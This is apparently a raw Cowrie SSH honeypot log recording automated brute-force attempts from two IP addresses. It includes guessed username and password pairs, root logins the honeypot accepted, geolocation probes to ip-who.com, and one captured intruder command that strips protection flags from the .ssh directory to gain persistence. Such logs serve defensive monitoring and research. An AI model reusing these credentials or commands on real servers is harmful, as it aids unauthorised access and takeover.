{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:11:52.125789Z","src_ip":"212.227.235.229","session":"835a3d445aa1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56076,"dst_ip":"1.2.3.4","dst_port":22,"session":"90bef8e3d364","protocol":"ssh","message":"New connection: 212.227.235.229:56076 (1.2.3.4:22) [session: 90bef8e3d364]","sensor":"my-vps","timestamp":"2025-08-26T04:11:52.599057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:11:52.910851Z","src_ip":"212.227.235.229","session":"90bef8e3d364"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:11:53.145441Z","src_ip":"212.227.235.229","session":"90bef8e3d364"}
{"eventid":"cowrie.login.failed","username":"newadmin","password":"newadmin","message":"login attempt [newadmin/newadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T04:11:54.656997Z","src_ip":"212.227.235.229","session":"835a3d445aa1"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:11:59.081501Z","src_ip":"212.227.235.229","session":"835a3d445aa1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43652,"dst_ip":"1.2.3.4","dst_port":22,"session":"a168166abdf4","protocol":"ssh","message":"New connection: 212.227.235.229:43652 (1.2.3.4:22) [session: a168166abdf4]","sensor":"my-vps","timestamp":"2025-08-26T04:12:00.888948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:12:00.897314Z","src_ip":"212.227.235.229","session":"a168166abdf4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:12:01.148517Z","src_ip":"212.227.235.229","session":"a168166abdf4"}
{"eventid":"cowrie.login.failed","username":"auto","password":"lifesize","message":"login attempt [auto/lifesize] failed","sensor":"my-vps","timestamp":"2025-08-26T04:12:01.175124Z","src_ip":"212.227.235.229","session":"90bef8e3d364"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:02.598357Z","src_ip":"212.227.235.229","session":"90bef8e3d364"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43656,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9b9e676408d","protocol":"ssh","message":"New connection: 212.227.235.229:43656 (1.2.3.4:22) [session: d9b9e676408d]","sensor":"my-vps","timestamp":"2025-08-26T04:12:04.794047Z"}
{"eventid":"cowrie.login.failed","username":"joggler","password":"joggler","message":"login attempt [joggler/joggler] failed","sensor":"my-vps","timestamp":"2025-08-26T04:12:04.966079Z","src_ip":"212.227.235.229","session":"a168166abdf4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:12:05.097746Z","src_ip":"212.227.235.229","session":"d9b9e676408d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:12:05.140038Z","src_ip":"212.227.235.229","session":"d9b9e676408d"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:06.296026Z","src_ip":"212.227.235.229","session":"a168166abdf4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41738,"dst_ip":"1.2.3.4","dst_port":22,"session":"5068dd7e3136","protocol":"ssh","message":"New connection: 212.227.235.229:41738 (1.2.3.4:22) [session: 5068dd7e3136]","sensor":"my-vps","timestamp":"2025-08-26T04:12:09.172642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:12:09.174234Z","src_ip":"212.227.235.229","session":"5068dd7e3136"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":55454,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa30c503acfe","protocol":"ssh","message":"New connection: 103.217.145.104:55454 (1.2.3.4:22) [session: aa30c503acfe]","sensor":"my-vps","timestamp":"2025-08-26T04:12:09.197978Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:12:09.200734Z","src_ip":"103.217.145.104","session":"aa30c503acfe"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:12:09.203296Z","src_ip":"212.227.235.229","session":"d9b9e676408d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:12:09.439473Z","src_ip":"212.227.235.229","session":"5068dd7e3136"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:12:09.468732Z","src_ip":"103.217.145.104","session":"aa30c503acfe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:12:09.744150Z","session":"d9b9e676408d"}
{"eventid":"cowrie.login.success","username":"root","password":"younes123","message":"login attempt [root/younes123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:12:10.915746Z","src_ip":"103.217.145.104","session":"aa30c503acfe"}
{"eventid":"cowrie.login.success","username":"root","password":"htpcguides","message":"login attempt [root/htpcguides] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:12:11.011238Z","src_ip":"212.227.235.229","session":"5068dd7e3136"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:12:11.284342Z","session":"5068dd7e3136"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:12:11.523007Z","src_ip":"103.217.145.104","session":"aa30c503acfe"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:12:11.523662Z","src_ip":"103.217.145.104","session":"aa30c503acfe"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:12:11.524719Z","src_ip":"103.217.145.104","session":"aa30c503acfe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:12:11.533370Z","src_ip":"212.227.235.229","session":"5068dd7e3136"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:11.797901Z","src_ip":"103.217.145.104","session":"aa30c503acfe"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:11.867565Z","src_ip":"212.227.235.229","session":"5068dd7e3136"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:12:11.904243Z","src_ip":"212.227.235.229","session":"d9b9e676408d"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:12.298512Z","src_ip":"212.227.235.229","session":"d9b9e676408d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:12:12.351584Z","src_ip":"103.217.145.104","session":"aa30c503acfe"}
